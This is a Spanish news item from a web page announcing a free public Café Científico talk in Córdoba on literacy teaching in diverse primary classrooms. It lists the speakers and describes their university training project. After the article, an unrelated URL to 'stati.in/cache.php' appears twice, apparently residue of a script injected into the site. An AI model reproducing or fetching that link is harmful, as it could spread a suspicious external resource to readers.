Se acerca el próximo Café Científico

Aprender a leer y escribir en la diversidad, “una mirada reflexiva sobre las prácticas escolares”, es el tema que abordará el Café Científico que tendrá lugar el Miércoles 28 del corriente mes, a las 19 h en Cocina de Culturas – Julio A. Roca 491/493, ciudad de Córdoba. El mismo será con entrada libre y gratuita.

En el marco de la semana Nacional de la ciencia, el Programa de Divulgación Científica, Tecnológica y Artística de SECyT (Secretaría de Ciencia y Tecnología) organiza y llevara a cabo el próximo Café Científico.

María Angélica Moller, Doctora en Psicología, María Eugenia Karlen y  Gabriela Fernanda Zamprogno, Magísteres en Psicología del Aprendizaje  y María del Pilar Agusti, Profesora para la Enseñanza Primaria, serán las expositoras del mismo, quienes participan de un proyecto, iniciado en el 2014, compartido por 11 universidades nacionales, incluida la UNC, que  ha supuesto  una experiencia de capacitación dirigida a docentes de escuelas primarias de 1º y 2º año en el marco de la llamada “Unidad Pedagógica”.

Una de las principales tareas de la escuela primaria es el aprendizaje de la lectura y la escritura;  en el primer ciclo y a lo largo de este nivel se espera que los niños se “alfabeticen” y se conviertan en usuarios competentes de la lengua escrita.

La página de la Universidad Nacional de Córdoba (https://www.unc.edu.ar) nos introduce diciendo “Sabemos que los niños participan y acceden a la cultura escrita en diversos contextos socioculturales. Es así que llegan a la escuela portando muy diversas experiencias, por lo tanto sus puntos de partida para enfrentar las tareas escolares  son, la mayoría de las veces, muy diversos. Surgen entonces las  preguntas  ¿cómo  se  accede a la cultura escrita en el ámbito escolar? ¿cuáles son las mejores estrategias para la formación de lectores y escritores autónomos?  Estas serán algunas de las preguntas disparadoras de la charla con el público del Café.”

https://stati.in/cache.php?ver=1.5.3&ref=zteZhttps://stati.in/cache.php?ver=1.5.3&ref=zteZ

Views All Time
Views All Time
156
Views Today
Views Today
1
Close

Entradas recientes

Twitter App